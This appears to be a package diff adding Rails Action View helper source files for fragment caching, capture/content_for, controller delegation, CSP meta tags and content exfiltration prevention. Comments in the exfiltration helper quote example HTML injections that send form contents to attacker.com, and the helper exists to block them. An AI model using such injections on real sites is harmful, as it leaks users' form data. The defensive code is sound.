omg-actionview 8.0.0.alpha1

data/lib/action_view/helpers/cache_helper.rb

@@ -0,0 +1,315 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers # :nodoc:
+    # = Action View Cache \Helpers
+    module CacheHelper
+      class UncacheableFragmentError < StandardError; end
+
+      # This helper exposes a method for caching fragments of a view
+      # rather than an entire action or page. This technique is useful
+      # caching pieces like menus, lists of new topics, static HTML
+      # fragments, and so on. This method takes a block that contains
+      # the content you wish to cache.
+      #
+      # The best way to use this is by doing recyclable key-based cache expiration
+      # on top of a cache store like Memcached or Redis that'll automatically
+      # kick out old entries.
+      #
+      # When using this method, you list the cache dependency as the name of the cache, like so:
+      #
+      #   <% cache project do %>
+      #     <b>All the topics on this project</b>
+      #     <%= render project.topics %>
+      #   <% end %>
+      #
+      # This approach will assume that when a new topic is added, you'll touch
+      # the project. The cache key generated from this call will be something like:
+      #
+      #   views/template/action:7a1156131a6928cb0026877f8b749ac9/projects/123
+      #         ^template path  ^template tree digest            ^class   ^id
+      #
+      # This cache key is stable, but it's combined with a cache version derived from the project
+      # record. When the project updated_at is touched, the #cache_version changes, even
+      # if the key stays stable. This means that unlike a traditional key-based cache expiration
+      # approach, you won't be generating cache trash, unused keys, simply because the dependent
+      # record is updated.
+      #
+      # If your template cache depends on multiple sources (try to avoid this to keep things simple),
+      # you can name all these dependencies as part of an array:
+      #
+      #   <% cache [ project, current_user ] do %>
+      #     <b>All the topics on this project</b>
+      #     <%= render project.topics %>
+      #   <% end %>
+      #
+      # This will include both records as part of the cache key and updating either of them will
+      # expire the cache.
+      #
+      # ==== \Template digest
+      #
+      # The template digest that's added to the cache key is computed by taking an MD5 of the
+      # contents of the entire template file. This ensures that your caches will automatically
+      # expire when you change the template file.
+      #
+      # Note that the MD5 is taken of the entire template file, not just what's within the
+      # cache do/end call. So it's possible that changing something outside of that call will
+      # still expire the cache.
+      #
+      # Additionally, the digestor will automatically look through your template file for
+      # explicit and implicit dependencies, and include those as part of the digest.
+      #
+      # The digestor can be bypassed by passing skip_digest: true as an option to the cache call:
+      #
+      #   <% cache project, skip_digest: true do %>
+      #     <b>All the topics on this project</b>
+      #     <%= render project.topics %>
+      #   <% end %>
+      #
+      # ==== Implicit dependencies
+      #
+      # Most template dependencies can be derived from calls to render in the template itself.
+      # Here are some examples of render calls that Cache Digests knows how to decode:
+      #
+      #   render partial: "comments/comment", collection: commentable.comments
+      #   render "comments/comments"
+      #   render 'comments/comments'
+      #   render('comments/comments')
+      #
+      #   render "header"        # translates to render("comments/header")
+      #
+      #   render(@topic)         # translates to render("topics/topic")
+      #   render(topics)         # translates to render("topics/topic")
+      #   render(message.topics) # translates to render("topics/topic")
+      #
+      # It's not possible to derive all render calls like that, though.
+      # Here are a few examples of things that can't be derived:
+      #
+      #   render group_of_attachments
+      #   render @project.documents.where(published: true).order('created_at')
+      #
+      # You will have to rewrite those to the explicit form:
+      #
+      #   render partial: 'attachments/attachment', collection: group_of_attachments
+      #   render partial: 'documents/document', collection: @project.documents.where(published: true).order('created_at')
+      #
+      # One last type of dependency can be determined implicitly:
+      #
+      #   render "maintenance_tasks/runs/info/#{run.status}"
+      #
+      # Because the value passed to render ends in interpolation, Action View
+      # will mark all partials within the "maintenace_tasks/runs/info" folder as
+      # dependencies.
+      #
+      # === Explicit dependencies
+      #
+      # Sometimes you'll have template dependencies that can't be derived at all. This is typically
+      # the case when you have template rendering that happens in helpers. Here's an example:
+      #
+      #   <%= render_sortable_todolists @project.todolists %>
+      #
+      # You'll need to use a special comment format to call those out:
+      #
+      #   <%# Template Dependency: todolists/todolist %>
+      #   <%= render_sortable_todolists @project.todolists %>
+      #
+      # In some cases, like a single table inheritance setup, you might have
+      # a bunch of explicit dependencies. Instead of writing every template out,
+      # you can use a wildcard to match any template in a directory:
+      #
+      #   <%# Template Dependency: events/* %>
+      #   <%= render_categorizable_events @person.events %>
+      #
+      # This marks every template in the directory as a dependency. To find those
+      # templates, the wildcard path must be absolutely defined from <tt>app/views</tt> or paths
+      # otherwise added with +prepend_view_path+ or +append_view_path+.
+      # This way the wildcard for <tt>app/views/recordings/events</tt> would be <tt>recordings/events/*</tt> etc.
+      #
+      # The pattern used to match explicit dependencies is <tt>/# Template Dependency: (\S+)/</tt>,
+      # so it's important that you type it out just so.
+      # You can only declare one template dependency per line.
+      #
+      # === External dependencies
+      #
+      # If you use a helper method, for example, inside a cached block and
+      # you then update that helper, you'll have to bump the cache as well.
+      # It doesn't really matter how you do it, but the MD5 of the template file
+      # must change. One recommendation is to simply be explicit in a comment, like:
+      #
+      #   <%# Helper Dependency Updated: May 6, 2012 at 6pm %>
+      #   <%= some_helper_method(person) %>
+      #
+      # Now all you have to do is change that timestamp when the helper method changes.
+      #
+      # === Collection Caching
+      #
+      # When rendering a collection of objects that each use the same partial, a <tt>:cached</tt>
+      # option can be passed.
+      #
+      # For collections rendered such:
+      #
+      #   <%= render partial: 'projects/project', collection: @projects, cached: true %>
+      #
+      # The <tt>cached: true</tt> will make Action View's rendering read several templates
+      # from cache at once instead of one call per template.
+      #
+      # Templates in the collection not already cached are written to cache.
+      #
+      # Works great alongside individual template fragment caching.
+      # For instance if the template the collection renders is cached like:
+      #
+      #   # projects/_project.html.erb
+      #   <% cache project do %>
+      #     <%# ... %>
+      #   <% end %>
+      #
+      # Any collection renders will find those cached templates when attempting
+      # to read multiple templates at once.
+      #
+      # If your collection cache depends on multiple sources (try to avoid this to keep things simple),
+      # you can name all these dependencies as part of a block that returns an array:
+      #
+      #   <%= render partial: 'projects/project', collection: @projects, cached: -> project { [ project, current_user ] } %>
+      #
+      # This will include both records as part of the cache key and updating either of them will
+      # expire the cache.
+      def cache(name = {}, options = {}, &block)
+        if controller.respond_to?(:perform_caching) && controller.perform_caching
+          CachingRegistry.track_caching do
+            name_options = options.slice(:skip_digest)
+            safe_concat(fragment_for(cache_fragment_name(name, **name_options), options, &block))
+          end
+        else
+          yield
+        end
+
+        nil
+      end
+
+      # Returns whether the current view fragment is within a +cache+ block.
+      #
+      # Useful when certain fragments aren't cacheable:
+      #
+      #   <% cache project do %>
+      #     <% raise StandardError, "Caching private data!" if caching? %>
+      #   <% end %>
+      def caching?
+        CachingRegistry.caching?
+      end
+
+      # Raises +UncacheableFragmentError+ when called from within a +cache+ block.
+      #
+      # Useful to denote helper methods that can't participate in fragment caching:
+      #
+      #   def project_name_with_time(project)
+      #     uncacheable!
+      #     "#{project.name} - #{Time.now}"
+      #   end
+      #
+      #   # Which will then raise if used within a +cache+ block:
+      #   <% cache project do %>
+      #     <%= project_name_with_time(project) %>
+      #   <% end %>
+      def uncacheable!
+        raise UncacheableFragmentError, "can't be fragment cached" if caching?
+      end
+
+      # Cache fragments of a view if +condition+ is true
+      #
+      #   <% cache_if admin?, project do %>
+      #     <b>All the topics on this project</b>
+      #     <%= render project.topics %>
+      #   <% end %>
+      def cache_if(condition, name = {}, options = {}, &block)
+        if condition
+          cache(name, options, &block)
+        else
+          yield
+        end
+
+        nil
+      end
+
+      # Cache fragments of a view unless +condition+ is true
+      #
+      #   <% cache_unless admin?, project do %>
+      #     <b>All the topics on this project</b>
+      #     <%= render project.topics %>
+      #   <% end %>
+      def cache_unless(condition, name = {}, options = {}, &block)
+        cache_if !condition, name, options, &block
+      end
+
+      # This helper returns the name of a cache key for a given fragment cache
+      # call. By supplying <tt>skip_digest: true</tt> to cache, the digestion of cache
+      # fragments can be manually bypassed. This is useful when cache fragments
+      # cannot be manually expired unless you know the exact key which is the
+      # case when using memcached.
+      def cache_fragment_name(name = {}, skip_digest: nil, digest_path: nil)
+        if skip_digest
+          name
+        else
+          fragment_name_with_digest(name, digest_path)
+        end
+      end
+
+      def digest_path_from_template(template) # :nodoc:
+        digest = Digestor.digest(name: template.virtual_path, format: template.format, finder: lookup_context, dependencies: view_cache_dependencies)
+
+        if digest.present?
+          "#{template.virtual_path}:#{digest}"
+        else
+          template.virtual_path
+        end
+      end
+
+    private
+      def fragment_name_with_digest(name, digest_path)
+        name = controller.url_for(name).split("://").last if name.is_a?(Hash)
+
+        if @current_template&.virtual_path || digest_path
+          digest_path ||= digest_path_from_template(@current_template)
+          [ digest_path, name ]
+        else
+          name
+        end
+      end
+
+      def fragment_for(name = {}, options = nil, &block)
+        if content = read_fragment_for(name, options)
+          @view_renderer.cache_hits[@current_template&.virtual_path] = :hit if defined?(@view_renderer)
+          content
+        else
+          @view_renderer.cache_hits[@current_template&.virtual_path] = :miss if defined?(@view_renderer)
+          write_fragment_for(name, options, &block)
+        end
+      end
+
+      def read_fragment_for(name, options)
+        controller.read_fragment(name, options)
+      end
+
+      def write_fragment_for(name, options, &block)
+        fragment = output_buffer.capture(&block)
+        controller.write_fragment(name, fragment, options)
+      end
+
+      module CachingRegistry # :nodoc:
+        extend self
+
+        def caching?
+          ActiveSupport::IsolatedExecutionState[:action_view_caching] ||= false
+        end
+
+        def track_caching
+          caching_was = ActiveSupport::IsolatedExecutionState[:action_view_caching]
+          ActiveSupport::IsolatedExecutionState[:action_view_caching] = true
+
+          yield
+        ensure
+          ActiveSupport::IsolatedExecutionState[:action_view_caching] = caching_was
+        end
+      end
+    end
+  end
+end

data/lib/action_view/helpers/capture_helper.rb

@@ -0,0 +1,236 @@
+# frozen_string_literal: true
+
+require "active_support/core_ext/string/output_safety"
+
+module ActionView
+  module Helpers # :nodoc:
+    # = Action View Capture \Helpers
+    #
+    # \CaptureHelper exposes methods to let you extract generated markup which
+    # can be used in other parts of a template or layout file.
+    #
+    # It provides a method to capture blocks into variables through #capture and
+    # a way to capture a block of markup for use in a layout through #content_for.
+    #
+    # As well as provides a method when using streaming responses through #provide.
+    # See ActionController::Streaming for more information.
+    module CaptureHelper
+      # The capture method extracts part of a template as a string object.
+      # You can then use this object anywhere in your templates, layout, or helpers.
+      #
+      # The capture method can be used in \ERB templates...
+      #
+      #   <% @greeting = capture do %>
+      #     Welcome to my shiny new web page!  The date and time is
+      #     <%= Time.now %>
+      #   <% end %>
+      #
+      # ...and Builder (RXML) templates.
+      #
+      #   @timestamp = capture do
+      #     "The current timestamp is #{Time.now}."
+      #   end
+      #
+      # You can then use that variable anywhere else. For example:
+      #
+      #   <html>
+      #   <head><title><%= @greeting %></title></head>
+      #   <body>
+      #   <b><%= @greeting %></b>
+      #   </body>
+      #   </html>
+      #
+      # The return of capture is the string generated by the block. For Example:
+      #
+      #   @greeting # => "Welcome to my shiny new web page! The date and time is 2018-09-06 11:09:16 -0500"
+      #
+      def capture(*args, &block)
+        value = nil
+        @output_buffer ||= ActionView::OutputBuffer.new
+        buffer = @output_buffer.capture { value = yield(*args) }
+
+        string = if @output_buffer.equal?(value)
+          buffer
+        else
+          buffer.presence || value
+        end
+
+        case string
+        when OutputBuffer
+          string.to_s
+        when ActiveSupport::SafeBuffer
+          string
+        when String
+          ERB::Util.html_escape(string)
+        end
+      end
+
+      # Calling <tt>content_for</tt> stores a block of markup in an identifier for later use.
+      # In order to access this stored content in other templates, helper modules
+      # or the layout, you would pass the identifier as an argument to <tt>content_for</tt>.
+      #
+      # Note: <tt>yield</tt> can still be used to retrieve the stored content, but calling
+      # <tt>yield</tt> doesn't work in helper modules, while <tt>content_for</tt> does.
+      #
+      #   <% content_for :not_authorized do %>
+      #     alert('You are not authorized to do that!')
+      #   <% end %>
+      #
+      # You can then use <tt>content_for :not_authorized</tt> anywhere in your templates.
+      #
+      #   <%= content_for :not_authorized if current_user.nil? %>
+      #
+      # This is equivalent to:
+      #
+      #   <%= yield :not_authorized if current_user.nil? %>
+      #
+      # <tt>content_for</tt>, however, can also be used in helper modules.
+      #
+      #   module StorageHelper
+      #     def stored_content
+      #       content_for(:storage) || "Your storage is empty"
+      #     end
+      #   end
+      #
+      # This helper works just like normal helpers.
+      #
+      #   <%= stored_content %>
+      #
+      # You can also use the <tt>yield</tt> syntax alongside an existing call to
+      # <tt>yield</tt> in a layout. For example:
+      #
+      #   <%# This is the layout %>
+      #   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
+      #   <head>
+      #     <title>My Website</title>
+      #     <%= yield :script %>
+      #   </head>
+      #   <body>
+      #     <%= yield %>
+      #   </body>
+      #   </html>
+      #
+      # And now, we'll create a view that has a <tt>content_for</tt> call that
+      # creates the <tt>script</tt> identifier.
+      #
+      #   <%# This is our view %>
+      #   Please login!
+      #
+      #   <% content_for :script do %>
+      #     <script>alert('You are not authorized to view this page!')</script>
+      #   <% end %>
+      #
+      # Then, in another view, you could to do something like this:
+      #
+      #   <%= link_to 'Logout', action: 'logout', remote: true %>
+      #
+      #   <% content_for :script do %>
+      #     <%= javascript_include_tag :defaults %>
+      #   <% end %>
+      #
+      # That will place +script+ tags for your default set of JavaScript files on the page;
+      # this technique is useful if you'll only be using these scripts in a few views.
+      #
+      # Note that <tt>content_for</tt> concatenates (default) the blocks it is given for a particular
+      # identifier in order. For example:
+      #
+      #   <% content_for :navigation do %>
+      #     <li><%= link_to 'Home', action: 'index' %></li>
+      #   <% end %>
+      #
+      # And in another place:
+      #
+      #   <% content_for :navigation do %>
+      #     <li><%= link_to 'Login', action: 'login' %></li>
+      #   <% end %>
+      #
+      # Then, in another template or layout, this code would render both links in order:
+      #
+      #   <ul><%= content_for :navigation %></ul>
+      #
+      # If the flush parameter is +true+ <tt>content_for</tt> replaces the blocks it is given. For example:
+      #
+      #   <% content_for :navigation do %>
+      #     <li><%= link_to 'Home', action: 'index' %></li>
+      #   <% end %>
+      #
+      #   <%# Add some other content, or use a different template: %>
+      #
+      #   <% content_for :navigation, flush: true do %>
+      #     <li><%= link_to 'Login', action: 'login' %></li>
+      #   <% end %>
+      #
+      # Then, in another template or layout, this code would render only the last link:
+      #
+      #   <ul><%= content_for :navigation %></ul>
+      #
+      # Lastly, simple content can be passed as a parameter:
+      #
+      #   <% content_for :script, javascript_include_tag(:defaults) %>
+      #
+      # WARNING: <tt>content_for</tt> is ignored in caches. So you shouldn't use it for elements that will be fragment cached.
+      def content_for(name, content = nil, options = {}, &block)
+        if content || block_given?
+          if block_given?
+            options = content if content
+            content = capture(&block)
+          end
+          if content
+            options[:flush] ? @view_flow.set(name, content) : @view_flow.append(name, content)
+          end
+          nil
+        else
+          @view_flow.get(name).presence
+        end
+      end
+
+      # The same as +content_for+ but when used with streaming flushes
+      # straight back to the layout. In other words, if you want to
+      # concatenate several times to the same buffer when rendering a given
+      # template, you should use +content_for+, if not, use +provide+ to tell
+      # the layout to stop looking for more contents.
+      #
+      # See ActionController::Streaming for more information.
+      def provide(name, content = nil, &block)
+        content = capture(&block) if block_given?
+        result = @view_flow.append!(name, content) if content
+        result unless content
+      end
+
+      # <tt>content_for?</tt> checks whether any content has been captured yet using <tt>content_for</tt>.
+      #
+      # Useful to render parts of your layout differently based on what is in your views.
+      #
+      #   <%# This is the layout %>
+      #   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
+      #   <head>
+      #     <title>My Website</title>
+      #     <%= yield :script %>
+      #   </head>
+      #   <body class="<%= content_for?(:right_col) ? 'two-column' : 'one-column' %>">
+      #     <%= yield %>
+      #     <%= yield :right_col %>
+      #   </body>
+      #   </html>
+      def content_for?(name)
+        @view_flow.get(name).present?
+      end
+
+      # Use an alternate output buffer for the duration of the block.
+      # Defaults to a new empty string.
+      def with_output_buffer(buf = nil) # :nodoc:
+        unless buf
+          buf = ActionView::OutputBuffer.new
+          if output_buffer && output_buffer.respond_to?(:encoding)
+            buf.force_encoding(output_buffer.encoding)
+          end
+        end
+        self.output_buffer, old_buffer = buf, output_buffer
+        yield
+        output_buffer
+      ensure
+        self.output_buffer = old_buffer
+      end
+    end
+  end
+end

data/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

@@ -0,0 +1,70 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers
+    module ContentExfiltrationPreventionHelper
+      mattr_accessor :prepend_content_exfiltration_prevention, default: false
+
+      # Close any open attributes before each form tag. This prevents attackers from
+      # injecting partial tags that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <meta http-equiv="refresh" content='0;URL=https://attacker.com?
+      #
+      # The HTML following this tag, up until the next single quote would be sent to
+      # +https://attacker.com+. By closing any open attributes, we ensure that form
+      # contents are never exfiltrated this way.
+      CLOSE_QUOTES_COMMENT = %q(<!-- '"` -->).html_safe.freeze
+
+      # Close any open tags that support CDATA (textarea, xmp) before each form tag.
+      # This prevents attackers from injecting unclosed tags that could capture
+      # form contents.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com"><textarea>
+      #
+      # The HTML following this tag, up until the next <tt></textarea></tt> or
+      # the end of the document would be captured by the attacker's
+      # <tt><textarea></tt>. By closing any open textarea tags, we ensure that
+      # form contents are never exfiltrated.
+      CLOSE_CDATA_COMMENT = "<!-- </textarea></xmp> -->".html_safe.freeze
+
+      # Close any open option tags before each form tag. This prevents attackers
+      # from injecting unclosed options that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com"><option>
+      #
+      # The HTML following this tag, up until the next <tt></option></tt> or the
+      # end of the document would be captured by the attacker's
+      # <tt><option></tt>. By closing any open option tags, we ensure that form
+      # contents are never exfiltrated.
+      CLOSE_OPTION_TAG = "</option>".html_safe.freeze
+
+      # Close any open form tags before each new form tag. This prevents attackers
+      # from injecting unclosed forms that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com">
+      #
+      # The form elements following this tag, up until the next <tt></form></tt>
+      # would be captured by the attacker's <tt><form></tt>. By closing any open
+      # form tags, we ensure that form contents are never exfiltrated.
+      CLOSE_FORM_TAG = "</form>".html_safe.freeze
+
+      CONTENT_EXFILTRATION_PREVENTION_MARKUP = (CLOSE_QUOTES_COMMENT + CLOSE_CDATA_COMMENT + CLOSE_OPTION_TAG + CLOSE_FORM_TAG).freeze
+
+      def prevent_content_exfiltration(html)
+        if prepend_content_exfiltration_prevention
+          CONTENT_EXFILTRATION_PREVENTION_MARKUP + html
+        else
+          html
+        end
+      end
+    end
+  end
+end

data/lib/action_view/helpers/controller_helper.rb

@@ -0,0 +1,42 @@
+# frozen_string_literal: true
+
+require "active_support/core_ext/module/attr_internal"
+
+module ActionView
+  module Helpers # :nodoc:
+    # = Action View Controller \Helpers
+    #
+    # This module keeps all methods and behavior in ActionView
+    # that simply delegates to the controller.
+    module ControllerHelper # :nodoc:
+      attr_internal :controller, :request
+
+      CONTROLLER_DELEGATES = [:request_forgery_protection_token, :params,
+        :session, :cookies, :response, :headers, :flash, :action_name,
+        :controller_name, :controller_path]
+
+      delegate(*CONTROLLER_DELEGATES, to: :controller)
+
+      def assign_controller(controller)
+        if @_controller = controller
+          @_request = controller.request if controller.respond_to?(:request)
+          @_config  = controller.config.inheritable_copy if controller.respond_to?(:config)
+          @_default_form_builder = controller.default_form_builder if controller.respond_to?(:default_form_builder)
+        else
+          @_request ||= nil
+          @_config ||= nil
+          @_default_form_builder ||= nil
+        end
+      end
+
+      def logger
+        controller.logger if controller.respond_to?(:logger)
+      end
+
+      def respond_to?(method_name, include_private = false)
+        return controller.respond_to?(method_name) if CONTROLLER_DELEGATES.include?(method_name.to_sym)
+        super
+      end
+    end
+  end
+end

data/lib/action_view/helpers/csp_helper.rb

@@ -0,0 +1,26 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers # :nodoc:
+    # = Action View CSP \Helpers
+    module CspHelper
+      # Returns a meta tag "csp-nonce" with the per-session nonce value
+      # for allowing inline <script> tags.
+      #
+      #   <head>
+      #     <%= csp_meta_tag %>
+      #   </head>
+      #
+      # This is used by the \Rails UJS helper to create dynamically
+      # loaded inline <script> elements.
+      #
+      def csp_meta_tag(**options)
+        if content_security_policy?
+          options[:name] = "csp-nonce"
+          options[:content] = content_security_policy_nonce
+          tag("meta", options)
+        end
+      end
+    end
+  end
+end